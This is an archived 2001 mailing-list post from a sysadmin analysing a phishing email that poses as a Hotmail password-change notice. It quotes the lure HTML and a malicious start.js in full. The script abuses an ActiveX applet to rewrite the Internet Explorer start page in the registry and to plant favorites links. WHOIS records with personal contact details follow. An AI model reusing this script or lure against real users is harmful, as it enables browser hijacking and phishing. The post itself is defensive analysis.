Hotmail message malware

From: quentynat_private
Date: Fri Aug 10 2001 - 06:09:24 PDT

  • Next message: Rio Martin.: "Re: Winnt/Win2k Vuln ?"

    there appears to be a new hotmail malware thingy it is sent from
    admin02at_private with the subject line of Password Change
    
    
    wonder how many people it will get before all the sites are closed?
    
    Detail - 
    
    I just recieved this mail from 202.104.122.157 [1]
    
    #START
    
    >From admin02at_private Thu, 09 Aug 2001 18:21:54 -0700
    Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id
    MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28
    -0700
    Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
    From: admin02at_private
    To: ${MYEMAIL}@hotmail.com
    Subject: Password Change
    Date: Sat, 8 Sep 2001 08:13:32
    Mime-Version: 1.0
    Content-Type: text/html; charset="DEFAULT_CHARSET"
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook Express 5.00.2919.6700
    X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
    
    <HTML>
    
    <HEAD>
    
    </HEAD>
    
    <BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B"
     ALINK="#FF0000">
    <P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change
    Confirmation</B></FONT>
    </P>
    <P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully
    changed. Please remember your new Password. </B></FONT></P>
    <P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A
    HREF="http://maeveshomepage.com/ty.htm">If you did not authorize this
    please
    click here to restore your old password.</A></FONT> </P>
    </BODY>
    </HTML>
    
    #END
    
    
    now going to maeveshomepage.com/ty.htm [2] in opera shows
    
    #START
    
    <!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO
    5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
     
    <HTML>
     
    <HEAD>
    <TITLE></TITLE>
    </HEAD>
     
    <BODY BGCOLOR="#336699">
     <P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
    <P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been
    restored.</FONT> <SCRIPT SRC="start.js">
    </SCRIPT>
    </P>
    </BODY>
    </HTML>
    
    #END
    
    and looking at start.js (the interesting bit)
    
    #START
    
    document.write("<APPLET HEIGHT=0 WIDTH=0
    code=com.ms.activeX.ActiveXComponent></APPLET>") function AddFavLnk(loc,
    DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
     Shor.TargetPath = SiteURL;
    Shor.Save();
    } function f(){
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject(); try{ var expdate = new Date((new Date()).getTime()
    + (24 * 60 * 60 * 1000 * 90));
    document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
    path=/;"
    ///////////////////////////////////////////////////////////////////////////////Ö÷Ò³
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
    Page", "http://yahhooo.devil.ru/");
    var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
    90));
    document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
    path=/;"
    var WF, Shor, loc;
    WF = FSO.GetSpecialFolder(0);
    loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc))
    {
    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName
    + "\\Favorites";
    if(!FSO.FolderExists(loc))
    {
    return;
    }
    }
    ///////////////////////////////////////////////////////////////////////////////ÊղؼÐ
    AddFavLnk(loc, " Britney Spears Nude",
    "http://www.celebrities-revealed.com");
    AddFavLnk(loc, " Aol", "http://www.aol.com");
    }
    catch(e){ }
    }
    catch(e){ }
    }
    function init(){
    setTimeout("f()", 1000);
    }
    init();
    
    #END
    
    it appears to set your default home page to http://yahhooo.devil.ru/ [3]
    and get your favorites (which may contain saved usernames and passwords)
    
    anybody got anything further?
    
    Q
    
    Notes
    
    [1] - inetnum:     202.104.122.128 - 202.104.122.159
        netname:     SHENZHEN-JLXXCY-INFOR-LTD
        descr:       SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
        country:     CN
        admin-c:     HB58-AP
        tech-c:      HB58-AP
        mnt-by:      MAINT-CHINANET-GD
        changed:     ipadmat_private 20000920
        source:      APNIC
    
        person:      HU BOG
        address:     F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
        country:     CN
        phone:       +86-755-3521135
        fax-no:      +86-755-3396971
        e-mail:      ipuserat_private
        nic-hdl:     HB58-AP
        mnt-by:      MAINT-CHINANET-GD
        changed:     ipadmat_private 20000920
        source:      APNIC
    
    
    [2] - Registrant:
         JBO
         223 S. 5th
         usa, O ---
         US    
    
         Domain Name: MAEVESHOMEPAGE.COM
         
         Administrative Contact:
            I, TJ  bwestbyat_private
            223 S. 5th
            usa, O ---
            US    
            1115551212
    
         Technical Contact:
            I, TJ  bwestbyat_private
            223 S. 5th
            usa, O ---
            US    
            1115551212
    
         Billing Contact:
            I, TJ  bwestbyat_private
            223 S. 5th
            usa, O ---
            US    
            1115551212
    
    
         Record last updated on 11-Jul-2001.
         Record expires on 07-May-2002.
         Record Created on 07-May-2001.
    
         Domain servers in listed order:
            NS1.VEGASSECURE.NET   208.50.15.6
            NS2.VEGASSECURE.NET   208.50.15.7
    
    [3] - domain:  DEVIL.RU
        type:    CORPORATE
        admin-o: AK2000-RIPN
        nserver: ns.kravchenko.ru. 
        nserver: srvr.list.ru. 
        created: 07-AUG-2000
        state:   Delegated
        changed: 19-MAY-2001
        mnt-by:  ANDRIUSHA-MNT-RIPN
        source:  RIPN
    
    
        person:  Andrey S Kravchenko
        nic-hdl: AK2000-RIPN
        address: Teatralny st 23a/30,
        address: Donetsk, Ukraine, 340100
        phone:   +7 902 6010000
        fax-no:  +7 902 6010000
        e-mail:  andreyat_private
        changed: 18-AUG-2000
        mnt-by:  ANDRIUSHA-MNT-RIPN
        source:  RIPN
    
    
    -- 
    #####################
    Quentyn Taylor
    Sysadmin - Fotango
    #####################
    You're damn right we need a rational code of morality and ethics. But
    not much progress can
    be made in that direction while we've still got a majority ranting about
    gods, devils, souls, and
    absolute morality, and using an ancient book written by ignorant nomads
    as a guide.
    



    This archive was generated by hypermail 2b30 : Fri Aug 10 2001 - 11:58:28 PDT